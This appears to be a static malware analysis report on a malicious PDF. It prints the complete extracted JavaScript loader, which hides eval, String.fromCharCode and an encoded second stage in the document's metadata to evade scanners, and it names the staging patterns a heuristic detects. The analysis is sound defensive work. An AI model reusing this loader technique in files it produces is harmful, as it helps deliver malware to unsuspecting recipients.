Malicious PDF — malware analysis report

Static analysis result for SHA-256 869dd0e03e2ae931…

Verdict: MALICIOUS
File type: PDF
Size: 17.8 KB
Created: 2011-72-51 03:25:00 (as recorded; not a valid calendar date)
Authoring application (/Producer): String.fromCharCode
First seen: 2013-07-12
MD5: 3f6a13171a46173cd35ad3761df45758
SHA-1: 23124ce9feb568d8b25b9a5066071fb246825ed5
SHA-256: 869dd0e03e2ae931a0b65a224548c10769009eeccec3dd2c43bbb19cc063efb1
Risk score: 114

Malware Insights

MITRE ATT&CK
  • T1059.007 Command and Scripting Interpreter: JavaScript
  • T1203 Exploitation for Client Execution
  • T1566.001 Phishing: Spearphishing Attachment

The PDF contains embedded JavaScript that acts as a loader for a second stage hidden in the document's own metadata. The /Title string is rewritten into a JavaScript array literal of numbers, /Subject names the global function used to evaluate strings (it must be eval, or the array literal could not be turned into an array), and /Producer holds the string "String.fromCharCode", which the loader resolves into the decoder that converts each number into a character. The decoded string is then handed back to the evaluator and executed. Splitting the logic across metadata fields, and never writing eval or String.fromCharCode in the script itself, is an evasion technique aimed at signature-based scanners; the critical PDF_JS_EXPLOIT_CLUSTER heuristic fires on this eval/fromCharCode staging pattern. The second stage itself lives in the /Title value, which is not reproduced in this report, so its behavior (exploit, dropper, downloader) is not established here; recovering it requires reading /Title, /Subject and /Producer from the document's Info dictionary. The primary delivery vector is likely a spearphishing attachment.

Machine Learning

  • Nyx PDF Classifier: malicious score 1.0000

Heuristics (3)

  • PDF_JAVASCRIPT (low, 2 related findings): JavaScript action
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF_JS_EXPLOIT_CLUSTER (critical): PDF JavaScript exploit cluster
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line (in the PDF's /Producer metadata entry, not in the JS stream; the script reads it via this.producer):
    /Producer (String.fromCharCode)
  • PDF_JS (low): Embedded JS stream
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: javascript_obj0001_000.js
Kind: pdf-javascript-stream
Source: PDF /JS object 1 at offset 0x450B
Size: 348 bytes
SHA-256: bb1cddb12aff2a7fc0037672788a1ab1af2f707183a0a634098c3891ecb15e9b

Extracted script (complete, 14 lines):
var w = 4;                                    // multiplier applied to every encoded value
var mdzuw = this.title.replace(/w/g,'*w,');   // /Title holds the payload as numbers separated by 'w'; each becomes "<n>*w,"
mdzuw = mdzuw.replace(/t/g,'2');              // 't' is a stand-in for the digit 2, so no literal 2 appears in /Title
mdzuw=mdzuw.substr(0,mdzuw.length-2) + ']';   // drop the trailing two characters and close the array literal
xfx=function(){return this}();                // plain call in sloppy mode: returns the global object
dwrgm=xfx[this.subject];                      // /Subject names the evaluator (must be eval for the next lines to work)
cfz=dwrgm(this.producer);                     // /Producer is "String.fromCharCode": resolve the decoder function
ugxlo = dwrgm(mdzuw);                         // evaluate the array literal into an array of character codes
var s = '';
for (i = 0; i < ugxlo.length; i++) {
	qcul = ugxlo[i];
	s += cfz(qcul);                           // rebuild the second-stage script one character at a time
}
dwrgm(s);                                     // execute the second stage